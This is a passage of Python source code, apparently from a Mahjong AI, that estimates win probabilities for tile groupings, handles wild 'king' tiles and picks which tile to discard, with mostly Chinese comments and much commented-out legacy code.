ab_ = False\n\n self.choose_n(t2NCopy, n_, rate_, results, ab_, abSet)\n\n def calculate_path_w(self, a, king_num, feiKing=1):\n \"\"\"\n 一条组合集的胡牌概率评估\n 分为有宝和无宝,无宝中又分为有将和无将情况进行计算\n :param a: 组合集\n :param king_num: 宝牌数量\n :param feiKing: 飞宝数\n :return: 胡牌概率和废牌\n \"\"\"\n path_w = [feiKing, copy.copy(a[-1])]\n t2N = MJ.deepcopy(a[2] + a[3])\n efc_cards, t2_w = self.get_effective_cards_w(dz_set=t2N, left_num=self.leftNum)\n for i in range(len(t2N)):\n t2N[i].append(t2_w[i])\n bl = 4 - len(self.suits) - (len(a[0]) + len(a[1]))\n # print (\"cost t2N\", t2N)\n results = []\n abSet = []\n if king_num == 0: # 无宝\n # 对aa集合中选择一个作为将牌,在剩余的t2N中使用choose_n计算胡牌概率\n if a[2] != []: # 定将\n t2N[:len(a[2])] = sorted(t2N[:len(a[2])], key=lambda k: k[2],\n reverse=True) # 这里倒置会更好,如果aa的权重为0会导致整个评估为0\n t2N[len(a[2]):] = sorted(t2N[len(a[2]):], key=lambda k: k[2], reverse=True)\n # if len(a[2])-1 <= bl:\n # self.jiang_rate(t2N[:len(a[2])])\n\n # has_ab = False\n # print ('bl', bl)\n if bl <= len(t2N) - 1: # t2N溢出,需要出一张2N\n # aa_rate=self.jiang_rate(aa)\n t2NCP = MJ.deepcopy(t2N)\n if a[-1] == [] and t2N != [] and a[4] != 0: # 只添加最后的废牌: 
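\n                    # NOTE (illustrative sketch; numbers are assumed, not from this codebase):\n                    # t2N overflow means len(t2N) exceeds bl, the melds still missing\n                    # (bl = 4 - len(suits) - len(kz) - len(sz)). e.g. bl = 2 with three\n                    # partial sets [[2, 3], [5, 5], [7, 8]]: the lowest-weight 2N is parked\n                    # as discards here before choose_n enumerates the remaining ones.\n                    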
#只有当废牌区为空时,才将2N放入\n path_w[1].append(t2N[-1][0])\n path_w[1].append(t2N[-1][1])\n t2NCP.remove(t2N[-1])\n # yc=len(t2NCP)-1-bl\n\n for aa in t2NCP[:len(a[2])]:\n t2NCopy = MJ.deepcopy(t2NCP)\n t2NCopy.remove(aa)\n merge_rate = 0\n t2NCopy.sort(key=lambda k: k[2], reverse=True)\n i = 0\n for t2 in t2NCopy[bl - 1:]:\n i += 1\n merge_rate += t2[2]\n if i != 0:\n for j in range(i - 1):\n t2NCopy.pop(-1)\n t2NCopy[-1][2] = merge_rate\n # print t2NCP,i,'t2NCopy',t2NCopy\n\n self.choose_n(t2N=t2NCopy, n=bl, rate=1, results=results, ab=False, abSet=abSet)\n for i in range(len(abSet)):\n if results[i] != 1:\n if abSet[i]:\n results[i] = float(results[i]) / w_ab\n else:\n results[i] = float(results[i]) / w_aa * 1.5\n nums = math.factorial(bl)\n path_w[0] *= float(sum(results)) / nums\n # print(\"results\", results)\n\n\n else:\n for i in range(bl - len(t2N) + 1):\n path_w[0] *= (80.0) / (self.remainNum * self.remainNum)\n # rateSet=[]\n for aa in t2N[:len(a[2])]:\n t2NCopy = MJ.deepcopy(t2N)\n t2NCopy.remove(aa)\n # todo 可以不用这种计算方法\n self.choose_n(t2N=t2NCopy, n=len(t2NCopy), rate=1, results=results, ab=False,\n abSet=abSet) # rate=1 # for t2 in t2NCopy: # rate*=t2[2] # rateSet.append(rate)\n # for i in range(len(abSet)):\n # if results[i] != 1:\n # if abSet[i]:\n # results[i] = float(results[i]) / (1+w_ways)\n # else:\n # results[i] = float(results[i]) / (1+3*w_ways)\n nums = math.factorial(len(t2N) - 1)\n path_w[0] *= float(sum(results)) / nums\n\n # 未定将牌\n # 同理,没有将牌的时候,直接在choose_n中计算胡牌概率\n else:\n if len(t2N) >= bl:\n t2NCP = MJ.deepcopy(t2N)\n if a[-1] == [] and t2N != []: # 只添加最后的废牌: #只有当废牌区为空时,才将2N放入\n path_w[1].append(t2N[-1][0])\n path_w[1].append(t2N[-1][1])\n t2NCP.remove(t2N[-1])\n merge_rate = 0\n t2NCP.sort(key=lambda k: k[2], reverse=True)\n i = 0\n for t2 in t2NCP[bl - 1:]:\n i += 1\n merge_rate += t2[2]\n if i != 0:\n for j in range(i - 1):\n t2NCP.pop(-1)\n t2NCP[-1][2] = merge_rate\n self.choose_n(t2N=t2NCP, n=bl, rate=1, results=results)\n nums = math.factorial(bl)\n path_w[0] *= float(sum(results)) / nums\n else:\n for i in range(bl - len(t2N)):\n path_w[0] *= (80.0) / (self.remainNum * self.remainNum)\n # todo\n self.choose_n(t2N=t2N, n=len(t2N), rate=1, results=results)\n nums = math.factorial(len(t2N))\n path_w[0] *= float(sum(results)) / nums\n # 将概率获取\n left_cards = path_w[1]\n w_jiang = [0] * len(left_cards)\n for k in range(len(left_cards)):\n if translate16_33(left_cards[k]) == -1: # todo 添加的牌为0?\n n = 3.0\n else:\n n = float(self.leftNum[translate16_33(left_cards[k])])\n w_jiang[k] = float(n) / self.remainNum # 可以摸到宝牌与其他废牌一起的概率+left_num[translate16_33(king_card)]\n path_w[0] *= max(w_jiang) # 添加将牌概率\n if len(left_cards) > 1: # 填胡状态下,差一个将牌胡牌,这里\n path_w[1].remove(left_cards[w_jiang.index(max(w_jiang))])\n if a[-1] == [] and len(a[3]) == 1 and a[4] == 1: # 添加没有将牌,但有刻子与2N的出牌情景\n kz = [] # 存在刻子\n for t in a[0]:\n if t[0] == t[1]:\n kz = t\n break\n if kz != []:\n _, rate_out_3N = self.get_effective_cards_w(dz_set=a[3], left_num=self.leftNum)\n if float(rate_out_3N[0]) / w_ab > path_w[0]:\n path_w[0] = float(rate_out_3N[0]) / w_ab\n path_w[1] = [kz[0]]\n\n else:\n feiKingHu = 0\n\n # 计算摸到其他2N有效牌的概率\n if a[2] != [] and a[4] == 1 and king_num == 1 and len(t2N) == 2: # 向听数为1,一张宝牌,达到胡牌状态,但是一张宝没做宝吊,不能胡,xts=1:\n\n if len(a[2]) == 2: # 计算摸到2张aa的概率\n feiKingHu = float(t2N[0][2] + t2N[1][2]) / w_aa # 飞宝胡牌概率,为可\n\n elif len(a[2]) == 1 and len(a[3]) == 1: # 一张aa,一张ab\n feiKingHu = float(t2N[1][2]) / w_ab # 飞宝胡牌概率\n # if len(self.get_effective_cards(a[3])) == 1: # 当胡牌是ac这种时,/2.5\n # 
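\n                # NOTE (illustrative; the weights below are assumed, not measured): the\n                # keep-or-fly decision that follows compares feiKingHu, the win rate after\n                # throwing the king tile, against the strongest 2N weight. With\n                # feiKingHu = 0.02 and t2N[max2Nindex][2] = 0.15, 0.02 * 5 = 0.10 < 0.15,\n                # so the king is kept and the weaker 2N pair is moved to the discards.\n                # 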
feiKingHu /= 2\n\n # todo aa过大会导致有aa就不飞宝\n t2N.sort(key=lambda k: k[2], reverse=True)\n if t2N[0][2] > t2N[1][2]:\n max2Nindex = 0\n else:\n max2Nindex = 1\n # if t2N[max2Nindex][0]==t2N[max2Nindex][1]:\n # NoFeiKingHu=float(t2N[max2Nindex][2])/w_aa*6 #矫正了真实的aa权重\n # else:\n # NoFeiKingHu=float(t2N[max2Nindex][2])/w_ab*2\n\n if feiKingHu * 5 < t2N[max2Nindex][2]: # 不飞宝,下调权重,增加飞宝概率\n # path_w[0] = t2N[max2Nindex][2]\n path_w[0] = t2N[max2Nindex][2]\n path_w[1].append(t2N[1 - max2Nindex][0]) # 添加废牌\n path_w[1].append(t2N[1 - max2Nindex][1])\n else: # 飞宝\n path_w[0] = feiKingHu * 2\n path_w[1].append(self.kingCard)\n #\n else: # 正常打\n # if True:\n t2N.sort(key=lambda k: k[2], reverse=True)\n if len(t2N) >= bl:\n if a[-1] == []:\n if t2N != []:\n\n path_w[1].append(t2N[-1][0])\n path_w[1].append(t2N[-1][1])\n t2NCP = MJ.deepcopy(t2N)\n t2NCP.remove(t2N[-1])\n\n # 不飞宝打法\n\n if bl - king_num + 1 >= 0:\n merge_rate = 0\n t2NCP.sort(key=lambda k: k[2], reverse=True)\n i = 0\n for t2 in t2NCP[bl - 1:]:\n i += 1\n merge_rate += t2[2]\n if i != 0:\n for j in range(i - 1):\n t2NCP.pop(-1)\n t2NCP[-1][2] = merge_rate\n # print ('t2NCP',t2NCP)\n self.choose_n(t2N=t2NCP, n=bl - king_num + 1, rate=1, results=results)\n nums = math.factorial(bl - king_num + 1)\n path_w[0] *= float(sum(results)) / nums\n\n # 飞宝打法\n\n aCopy = MJ.deepcopy(a)\n aCopy[-1].append(self.kingCard)\n # 宝-1后,再次计算胡牌概率,可能只有一个宝,所以会变为计算无宝的打法,还剩下宝会另计算\n path_w_feiKing = self.calculate_path_w(aCopy, king_num - 1, 2)\n # print ('comparable', path_w, path_w_feiKing)\n if path_w[0] <= path_w_feiKing[0] * feiKing:\n path_w = path_w_feiKing\n\n else:\n if bl - king_num + 1 >= 0:\n self.choose_n(t2N=t2N, n=bl - king_num + 1, rate=1, results=results)\n nums = math.factorial(bl - king_num + 1)\n path_w[0] *= float(sum(results)) / nums\n\n\n\n\n else: # 未溢出\n # t2NCP = copy.deepcopy(t2N)\n # for i in range(use_king):\n # t2NCP.pop(-1)\n # 不够的添加\n for i in range(bl - len(t2N)):\n path_w[0] *= (80.0) / (self.remainNum * self.remainNum)\n if len(t2N) - king_num + 1 >= 0:\n self.choose_n(t2N=t2N, n=len(t2N) - king_num + 1, rate=1, results=results)\n nums = math.factorial(len(t2N) - king_num + 1)\n path_w[0] *= float(sum(results)) / nums\n\n if king_num - 1 > len(t2N):\n use_king = len(t2N)\n else:\n use_king = king_num - 1\n if use_king > 0 and path_w[1] == []: # 表示宝牌未用完,这里可以打出一张宝牌\n for i in range(use_king):\n path_w[1].append(self.kingCard)\n # print ('results', results, len(results),nums)\n\n return path_w\n\n def cost(self, all, suits, left_num=[], king_num=0, king_card=None):\n \"\"\"\n 功能:计算组合评估值--胡牌概率,对组合中没有废牌的情况计算出废牌并输出\n 思路:计算胡牌概率,摸到有效牌概率的累乘值,分为有将牌或宝牌和无将牌2种情况处理,无将牌中需要计算将牌概率,有宝牌情况将1张宝作为将牌,\n 多余宝牌作为有效牌使用。对没有废牌的情况,将有效牌概率最低的搭子放入到废牌区\n :param all: 组合信息\n :param suits: 副露\n :param left_num: 剩余牌\n :param king_num: 宝数量\n :param king_card: 宝牌\n :return: path_w [rate,leftCards]组合的评估值和废牌\n \"\"\"\n # pengpenghu=True\n # for s in self.suits:\n # if s[0]!=s[1]:\n # pengpenghu=False\n # break\n # path_w[0] 胡牌概率\n # path_w[1] 废牌表\n path_w = [] # 创建一个存储胡牌概率和废牌的list\n for i in range(len(all)):\n path_w.append([1.0, MJ.deepcopy(all[i][-1])])\n\n # 全部搜索会导致搜索空间极大\n for index_all in range(len(all)): # 选出最大期望概率胡牌路径,选择该路径,从剩余牌中再选择最佳出牌顺序,局部最优\n\n path_w[index_all] = self.calculate_path_w(all[index_all], king_num, 1)\n\n # # else:\n # #\n # # for i in range(1, bl + 1):\n # # # if t2N[i][0] == t2N[i][1] and ((i + 1 == bl + 1) or self.is_last_aa(\n # # # t2N[i + 1:bl + 1])): # 最后一个aa可以享受第一个aa(将牌)的获取概率\n # # # path_w[index_all][0] *= (t2N[i][2] + t2N[0][2])\n # # # 
else:\n # # path_w[index_all][0] *= t2N[i][2]\n # # # if len(a[2])>1:\n # #\n # # if t2N[i][0] != t2N[i][1]:\n # # has_ab = True\n # # #aa将牌权重奖励\n # # path_w[index_all][0]*=len(a[2])\n # #\n # # #多余的2N也加到概率中来\n # # # rate_redundant=1\n # # # for i in range(bl+1,len(t2N)):\n # # # rate_redundant+=t2N[i][2]\n # # # path_w[index_all][0]*=rate_redundant\n # #\n # #\n # # for j in range(bl + 1, len(t2N)): # 废牌添加,\n # # if a[-1] == [] and j == len(t2N) - 1: # 只添加最后的废牌: #只有当废牌区为空时,才将2N放入\n # # path_w[index_all][1].append(t2N[-1][0])\n # # path_w[index_all][1].append(t2N[-1][1])\n # #\n # # else:\n # # for i in range(1, len(t2N)):\n # # # if t2N[i][0] == t2N[i][1] and ((i + 1 == len(t2N)) or self.is_last_aa(t2N[i + 1:])):\n # # # path_w[index_all][0] *= (t2N[i][2] + t2N[0][2])\n # # # else:\n # # path_w[index_all][0] *= t2N[i][2]\n # # if t2N[i][0] != t2N[i][1]:\n # # has_ab = True\n # # # aa将牌权重奖励\n # # path_w[index_all][0]*=len(a[2])\n # #\n # # for j in range(bl - len(t2N) + 1): # TODO 未填的3N ,这种处理方法有点粗糙\n # # path_w[index_all][0] *= float(100.0) / (self.remainNum * self.remainNum)\n # # #自摸权重为1,\n # # if path_w[index_all][0] != 1:\n # # if has_ab:\n # # path_w[index_all][0] *= 1.0 / w_ab\n # # else:\n # # path_w[index_all][0] *= 1.0 / w_aa\n #\n #\n # else: # 未定将牌\n # t2N = sorted(t2N, key=lambda k: k[2], reverse=True)\n # # has_ab=False\n # if bl <= len(t2N): # t2N溢出,需要出一张2N\n # for t in t2N[:bl]: # 计算胡牌概率\n # path_w[index_all][0] *= t[2]\n # # if t[0] != t[1]:\n # # has_ab = True\n # #多余2N的概率\n # # rate_redundant = 1\n # # for i in range(bl, len(t2N)):\n # # rate_redundant += t2N[i][2]\n # # path_w[index_all][0] *= rate_redundant\n #\n # for j in range(bl, len(t2N)): # 废牌添加\n # if a[-1] == [] and j == len(t2N) - 1: # 只添加最后的废牌: #只有当废牌区为空时,才将2N放入\n # path_w[index_all][1].append(t2N[-1][0])\n # path_w[index_all][1].append(t2N[-1][1])\n # else:\n # for t in t2N:\n # path_w[index_all][0] *= t[2]\n # # if t[0] != t[1]:\n # # has_ab = True\n # for j in range(bl - len(t2N)): # 未填的3N\n # path_w[index_all][0] *= float(100.0) / (self.remainNum * self.remainNum) # TODO 3N补充,待改进\n #\n # left_cards = path_w[index_all][1]\n #\n # w_jiang = [0] * len(left_cards)\n # for k in range(len(left_cards)):\n # w_jiang[k] = float(left_num[translate16_33(\n # left_cards[k])]) / self.remainNum # 可以摸到宝牌与其他废牌一起的概率+left_num[translate16_33(king_card)]\n # path_w[index_all][0] *= max(w_jiang) # 添加将牌概率\n # if len(left_cards) > 1: # 填胡状态下,差一个将牌胡牌,这里\n # path_w[index_all][1].remove(left_cards[w_jiang.index(max(w_jiang))])\n # if a[-1] == [] and len(a[3]) == 1: # 添加没有将牌,但有刻子与2N的出牌情景\n # kz = [] # 存在刻子\n # for t in a[0]:\n # if t[0] == t[1]:\n # kz = t\n # break\n # if kz != []:\n #\n # _, rate_out_3N = self.get_effective_cards_w(dz_set=a[3], left_num=left_num)\n # if float(rate_out_3N[0]) / w_aa > path_w[index_all][0]:\n # path_w[index_all][0] = float(rate_out_3N[0]) / w_aa\n # path_w[index_all][1] = [kz[0]]\n # # if pengpenghu and not has_ab:\n # # path_w[index_all][0]*=4\n # else: # 有宝,宝必须做宝吊或者飞宝,如34 66 king,飞宝成为选择之一\n # # 不飞宝:打6,计算摸到25概率,打3/4,计算摸到6的概率\n # # 飞宝:摸到34有效牌概率\n # feiKingHu = 0\n #\n # # 计算摸到其他2N有效牌的概率\n # if a[2] != [] and a[4] == 1 and king_num == 1 and len(\n # t2N) == 2: # 向听数为1,一张宝牌,达到胡牌状态,但是一张宝没做宝吊,不能胡,xts=1:\n # if len(a[2]) == 2: # 计算摸到2张aa的概率\n # # if pengpenghu:\n # # p=4\n # # else:\n # # p=1\n # feiKingHu = float(t2N[0][2] + t2N[1][2] + 2 * w_type) / w_aa # 飞宝胡牌概率,为可\n # print t2N[0][2],t2N[1][2]\n # elif len(a[2]) == 1 and len(a[3]) == 1: # 一张aa,一张ab\n # feiKingHu = float(t2N[1][2]) / w_ab # 飞宝胡牌概率\n 
#\n # t2N.sort(key=lambda k: k[2], reverse=True)\n # if t2N[0][2] > t2N[1][2]:\n # max2Nindex = 0\n # else:\n # max2Nindex = 1\n # # if t2N[max2Nindex][0]==t2N[max2Nindex][1]:\n # print ('11',feiKingHu * 3, t2N[max2Nindex][2])\n # if feiKingHu * 3 < t2N[max2Nindex][2]: # 不飞宝,下调权重,增加飞宝概率\n # path_w[index_all][0] = t2N[max2Nindex][2]\n #\n # path_w[index_all][1].append(t2N[1 - max2Nindex][0]) # 添加废牌\n # path_w[index_all][1].append(t2N[1 - max2Nindex][1])\n # else: # 飞宝\n # path_w[index_all][0] = feiKingHu\n # path_w[index_all][1].append(king_card)\n #\n # else: # 未达到胡牌状态时,先不打宝牌\n # # 废牌区已为空,打价值最低的t2N\n # # print (\"cost t2N\",t2N)\n # # has_ab=False\n # rate_hu = 0\n # use_king = king_num - 1\n #\n # print ('bl,len(t2N)', bl, len(t2N))\n # if bl <= len(t2N): # t2N溢出\n # t2N.sort(key=lambda k: k[2], reverse=True)\n # for i in range(bl - 1, -1, -1):\n # if use_king > 0: # 使用宝牌,rate_hu加上有效牌的概率,而不是乘\n # use_king -= 1\n # rate_hu += t2N[i][2]\n # continue\n # elif use_king == 0:\n # use_king = -1 # 表示宝牌已全部用完\n # if rate_hu != 0: # 待修改 说明宝牌的数量大于1,宝牌的作用可以给\n # path_w[index_all][0] *= (rate_hu + t2N[i][2])\n # continue\n # path_w[index_all][0] *= t2N[i][2]\n # # if t2N[i][0] != t2N[i][1]:\n # # has_ab = True\n # # if a[-1] == []: # 只有废牌区为空时,才添加2N\n #\n # # rate_redundant = 1\n # # for i in range(bl, len(t2N)):\n # # rate_redundant += t2N[i][2]\n # # path_w[index_all][0] *= rate_redundant\n #\n # for j in range(bl, len(t2N)): # 废牌添加\n # if a[-1] == [] and j == len(t2N) - 1: # 只添加最后的2N废牌\n # path_w[index_all][1].append(t2N[j][0])\n # path_w[index_all][1].append(t2N[j][1]) # path_w[index_all][0]=rate_hu\n # else: # t2N未溢出,需待填3N\n # t2N.sort(key=lambda k: k[2], reverse=True) # 添加了reverse\n # for i in range(len(t2N) - 1, -1, -1): # 反向计算t2N的获取概率\n # if use_king > 0: # 使用宝牌,rate_hu加上有效牌的概率,而不是乘\n # use_king -= 1\n # rate_hu += t2N[i][2]\n # continue\n # elif use_king == 0:\n # use_king = -1 # 表示宝牌已全部用完\n # if rate_hu != 0:\n # path_w[index_all][0] *= (rate_hu + t2N[i][2])\n # continue\n #\n # path_w[index_all][0] *= t2N[i][2]\n # for j in range(bl - len(t2N)): # 待填的3N\n # path_w[index_all][0] *= float(100.0) / (self.remainNum * self.remainNum) # TODO 有待补充\n # if use_king > 0 and path_w[index_all][1] == []: # 表示宝牌未用完,这里可以打出一张宝牌\n # for i in range(use_king):\n # path_w[index_all][1].append(king_card) # print (\"cost,bl t2N\",bl,t2N)0\n\n # print(\"path_w_end\", path_w)\n return path_w\n\n def discards_w(self, discards=[], left_num=[], ndcards={}):\n \"\"\"\n 功能:计算废牌评估,并返回评估值最低的废牌作为最后的出牌\n 思路:计算出每张废牌成为3N的概率,其中使用了搭子作为候选牌,例如废牌为5 ,当有66的情况时,将66作为已获取牌,并在leftCards中进行更新,将6的有效牌置为剩余牌总数\n :param discards: 废牌集合\n :param left_num: 剩余牌数量\n :param ndcards: 次级孤张牌\n :return: 最小评估值的废牌\n \"\"\"\n discards_w = []\n if discards == []:\n return 0x00\n for card in discards:\n left_numCP = copy.copy(left_num)\n if ndcards != {}:\n if card in ndcards.keys():\n for ndcard in ndcards[card]:\n left_numCP[convert_hex2index(ndcard)] = self.remainNum\n discards_w.append(self.left_card_weight(card=card, left_num=left_numCP)) # 更新点:添加废牌权重\n return discards[discards_w.index(min(discards_w))]\n\n def get_efcCards(self, dz_set=[]):\n \"\"\"\n 获取所有搭子的有效牌,不去重\n :param dz_set: 搭子集合\n :return: effective_cards [] 有效牌集合 不去重\n \"\"\"\n effective_cards = []\n for dz in dz_set:\n if len(dz) == 1:\n effective_cards.append([dz[0]])\n elif dz[1] == dz[0]:\n effective_cards.append([dz[0]])\n elif dz[1] == dz[0] + 1:\n if int(dz[0]) & 0x0F == 1:\n effective_cards.append([dz[0] + 2])\n elif int(dz[0]) & 0x0F == 8:\n effective_cards.append([dz[0] - 1])\n 
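# NOTE (worked example): edge pairs wait on a single tile, [1, 2] only on 3 and\n                # [8, 9] only on 7; the else branch below covers middle pairs, e.g. [2, 3]\n                # waits on both 1 and 4, i.e. dz[0] - 1 and dz[0] + 2.\n                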
else:\n effective_cards.append([dz[0] - 1, dz[0] + 2])\n\n elif dz[1] == dz[0] + 2:\n effective_cards.append([dz[0] + 1])\n return effective_cards\n\n def contain(self, ab1=[], ab2=[]):\n \"\"\"\n 功能:计算组合是否存在包含关系,例如467中组合46会包含于67中,需要去除前者,避免重复计算。\n 思路:分别判断2个组合中的搭子有效牌是否存在包含关系,先分别获取搭子的有效牌,如果某一组合的所有有效牌都包含于另一组合,则判定该组合包含于另一组合中。\n 如果ab2有效牌全部包含于ab1 中,返回1,相反则返回2,没关系则返回0\n :param ab1: 组合1的搭子集合\n :param ab2: 组合2的搭子集合\n :return: int 如果ab2有效牌全部包含于ab1 中,返回1,相反则返回2,没关系则返回0\n \"\"\"\n efc1 = self.get_effective_cards(ab1)\n efc2 = self.get_effective_cards(ab2)\n\n # 判断ab1 是否包含于ab2中\n contain1in2 = True\n for ab in ab1:\n if ab in ab2:\n continue\n else:\n efc = self.get_effective_cards([ab])\n if len(efc) == 2:\n contain1in2 = False\n break\n elif efc[0] in efc2:\n continue\n else:\n contain1in2 = False\n break\n\n contain2in1 = True\n for ab in ab2:\n if ab in ab1:\n continue\n else:\n efc = self.get_effective_cards([ab])\n if len(efc) == 2:\n contain2in1 = False\n break\n elif efc[0] in efc1:\n continue\n else:\n contain2in1 = False\n break\n if contain1in2:\n return 2\n elif contain2in1:\n return 1\n else:\n return 0\n\n def mergeSameall(self, all):\n \"\"\"\n 功能:对组合进行去重处理,去除有效牌全部包含于另一组合的情况,例如 3456会被拆分为 345 456 两种情况,578 会被拆分为57和78情况,避免了后面评估值计算时的重复计算\n 思路:遍历组合,对本次组合后面的所有组合判断时候存在包含关系,当存在包含关系时,更新有效牌多的组合为本次的最终组合,并标记已被去除的组合,该组合不再被遍历\n :param all: 组合信息\n :return: 去重后的组合\n \"\"\"\n used_index = []\n all3 = []\n # 合并去掉\n # todo 有效牌相同的组也可以合并\n for i in range(len(all)): # 将2N相同的组合并\n a = MJ.deepcopy(all[i])\n if i in used_index:\n continue\n for j in range(i + 1, len(all)):\n if len(all[j][0]) + len(all[j][1]) == len(a[0]) + len(a[1]) and all[j][2] == a[2]:\n if all[j][3] == a[3]:\n used_index.append(j)\n for card in all[j][-1]:\n if card not in a[-1]:\n a[-1].append(card)\n # else:\n #\n # relation = self.contain(a[3], all[j][3])\n # if relation == 1:\n # # a=copy.copy(all[j])\n # used_index.append(j)\n #\n #\n # elif relation == 2: #todo 这样换可能会导致前面已经合并的被移除了.但是这种可能很少\n #\n # a = copy.deepcopy(all[j])\n # used_index.append(j)\n all3.append(a)\n return all3\n\n def defend_V2_2(self, all_combination):\n \"\"\"\n 功能:出牌策略\n 思路:分为3阶段,第一阶段完全孤张牌出牌策略,计算出所有组合中都包含的孤张牌,出评估值最低的孤张牌,剩余牌与孤张牌的联系性最低\n 第二阶段:当xts<=3时,采用搜索树计算出最佳出牌\n 第三阶段:当xts>3时,采用快速评估的方法计算出最佳出牌\n :param all_combination: 组合信息\n :return: 决策出牌\n \"\"\"\n\n '''\n 第一阶段:完全孤张牌出牌策略\n 原则:出相关性最低的孤张牌,剩余牌与孤张牌的联系性最低\n 现阶段只考虑xts最小的情况\n '''\n\n all_same_xts = []\n # all_same_xts_and_left = []\n\n min_xts = all_combination[0][-2]\n for a in all_combination: # 获取xts相同的组合\n if a[-2] == min_xts:\n all_same_xts.append(a)\n # if a[-2] == min_xts and len(a[-1])==len(all_combination[0][-1]):\n # all_same_xts_and_left.append(a)\n all_MG = copy.copy(all_same_xts)\n\n # 移除搭子有效牌被覆盖的划分 ,可能出现3 56的情况,3会获得更多的机会123,234,333,345\n # for a in all_same_xts:\n # flag = False\n # for t1 in a[-1]:\n # if not flag:\n # for t2 in a[2] + a[3]:\n # th = copy.copy(t2)\n # th.append(t1)\n # th.sort()\n # if th in MJ.T2_HALF:\n # if t2 not in MJ.T2_HALF_T2 or (\n # t2 in [[2, 4], [6, 8], [0x12, 0x14], [0x16, 0x18], [0x22, 0x24],\n # [0x26, 0x28]] and t1 not in [1, 9, 0x11, 0x19, 0x21, 0x29]):\n # logger.info(\"remove duplication cs, %s,%s,%s\", a, t2, t1)\n # all_MG.remove(a)\n # flag = True\n # break\n\n # if all_MG == []:\n # all_MG = all_same_xts\n\n # 去重处理\n # 有效牌数量为0的组合应该被视为废牌 todo 宝还原\n if True: # 这一段是必须的!\n if self.kingNum <= 1: # 这里只考虑出牌、宝做宝吊的情况\n for a in all_MG:\n for i in range(len(a[3]) - 1, -1, -1):\n ab = a[3][i]\n efc = self.get_effective_cards([ab])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] 
for e in efc]) <= 0: # 先只算有效牌数量为0\n a[3].remove(ab)\n a[-1].extend(ab)\n # logger.info(\"remove ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits,\n # self.kingCard, a)\n # for a in all_MG: #todo 20201013\n # a_temp = MJ.deepcopy(a)\n # for i in range(len(a_temp[3]) - 1, -1, -1):\n # ab = a_temp[3][i]\n # efc = self.get_effective_cards([ab])\n # if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1: #先只算有效牌数量为0\n # a_temp[3].remove(ab)\n # a_temp[-1].extend(ab)\n # # logger.info(\"append ab with low getting rate, %s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # if a_temp!=a:\n # all_MG.append(a_temp)\n all_MG = self.xts(all_MG, self.suits, self.kingNum)\n\n # print ('all_MG', all_MG)\n left_all_cards = [] # 全部组合的废牌集合\n\n for branch in all_MG:\n left_all_cards += branch[-1]\n unique_l = list(set(left_all_cards))\n left_cards = [] # 任何组合都包含的真正废牌\n left_cards_w = []\n need_jiang = False\n if all_MG[0][-2] == 1:\n if len(all_MG[0][0]) + len(all_MG[0][1]) + len(self.suits) == 4 and all_MG[0][-1] == 2:\n need_jiang = True\n\n for card in unique_l:\n if left_all_cards.count(card) == len(all_MG):\n left_cards.append(card)\n left_cards_w.append(\n self.left_card_weight(card=card, left_num=LEFT_NUM, need_jiang=need_jiang)) # 更新点:添加废牌权重\n if left_cards != []: # and all_MG[0][-2]>3:\n # if min(left_cards_w)<25: #当出37 5 的时候需要限制下\n # 这里也只能在搭子过多的情况下才会出,给的限制条件放宽点\n # if need_jiang or ((not need_jiang) and min(left_cards_w)<70):\n if True:\n print('state first')\n return left_cards[left_cards_w.index(min(left_cards_w))]\n\n '''\n 第二阶段\n 当unique_l不为空时,从所有废牌(unique_l)中出一张\n 如果为空,从所有的t2N中出一张\n '''\n # 在xts<3的情况下,使用搜索树\n # if all_MG[0][4] <= 3:\n if False:\n Tree = SearchTree(cards=self.cards, suits=self.suits, leftNum=self.leftNum, all=all_same_xts,\n remainNum=self.remainNum, dgtable=[1] * 34, kingCard=self.kingCard,\n feiKingNum=self.fei_king)\n scoreDict = Tree.getCardScore()\n king_score = 0\n if self.kingCard in scoreDict.keys():\n king_score = scoreDict[self.kingCard]\n scoreDict = sorted(scoreDict.items(), key=lambda k: k[1], reverse=True)\n maxScoreCards = []\n # print ('scoreDict',scoreDict)\n if scoreDict != [] and king_score * 1.5 >= scoreDict[0][1]:\n return self.kingCard\n\n for i in range(len(scoreDict)):\n # print (scoreDict[i][1],scoreDict[0][1])\n if scoreDict[i][1] == scoreDict[0][1]:\n maxScoreCards.append(scoreDict[i][0])\n print('maxScoreCards', maxScoreCards)\n print(scoreDict)\n # if maxScoreCards != []:\n # return self.discards_w(maxScoreCards, self.leftNum, ndcards={})\n\n # 加入处理概率过低的搭子的组合\n # todo 容易出现超时,增加向听数小于等于3的限制条件\n if False:\n # if all_MG[0][-2]<=3:\n supplement = []\n for a in all_MG:\n # print a\n a_copy = MJ.deepcopy(a)\n for ab in a[3]:\n efc = self.get_effective_cards([ab])\n # print ab,sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc])\n if sum([LEFT_NUM[MJ.convert_hex2index(e)] for e in efc]) <= 1:\n a_copy[3].remove(ab)\n a_copy[-1].extend(ab)\n # logger.info(\"remove rate 0 ab,%s,%s,%s,a=%s\", self.cards, self.suits, self.kingCard, a)\n # break\n\n if len(a_copy[3]) != len(a[3]):\n supplement.append(a_copy)\n # logger.info(\"supplement a1=%s,a2=%s\", a, a_copy)\n all_MG.extend(supplement)\n # print all_MG\n if False:\n # 加入碰碰胡处理 加到后面并不影响孤张出牌,只在搜索中使用碰碰胡\n rm_king = copy.copy(self.cards)\n for i in range(self.kingNum):\n rm_king.remove(self.kingCard)\n a_pengpenghu = self.pengpengHu(outKingCards=rm_king, suits=self.suits, kingNum=self.kingNum)\n if a_pengpenghu != [] and a_pengpenghu[0][-2] - 1 <= all_MG[0][-2]: # 现在用1\n if 
